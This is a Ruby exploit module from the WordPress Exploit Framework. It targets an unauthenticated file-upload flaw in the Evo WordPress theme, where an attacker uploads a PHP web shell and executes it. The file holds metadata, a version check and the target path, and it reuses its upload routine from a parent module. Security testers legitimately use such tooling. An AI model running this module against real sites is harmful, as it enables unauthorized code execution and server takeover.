lib/wpxf/modules/exploit/shell/evo_theme_shell_upload.rb
# frozen_string_literal: true
require 'socket'
class Wpxf::Exploit::EvoThemeShellUpload < Wpxf::Exploit::SimplecartShellUpload
include Wpxf
def initialize
super
update_info(
name: 'Evo Theme Shell Upload',
desc: 'This module exploits a file upload vulnerability in all versions '\
'of the Evo theme found in the upload_file.php script '\
'which contains no session or file validation. It allows '\
'unauthenticated users to upload files of any type and '\
'subsequently execute PHP scripts in the context of the '\
'web server.',
author: [
'Divya', # Vulnerability disclosure
'rastating' # WPXF module
],
references: [
['EDB', '36611']
],
date: 'April 02 2015'
)
end
def check
check_theme_version_from_readme('evo')
end
def plugin_url
normalize_uri(wordpress_url_themes, 'evo')
end
end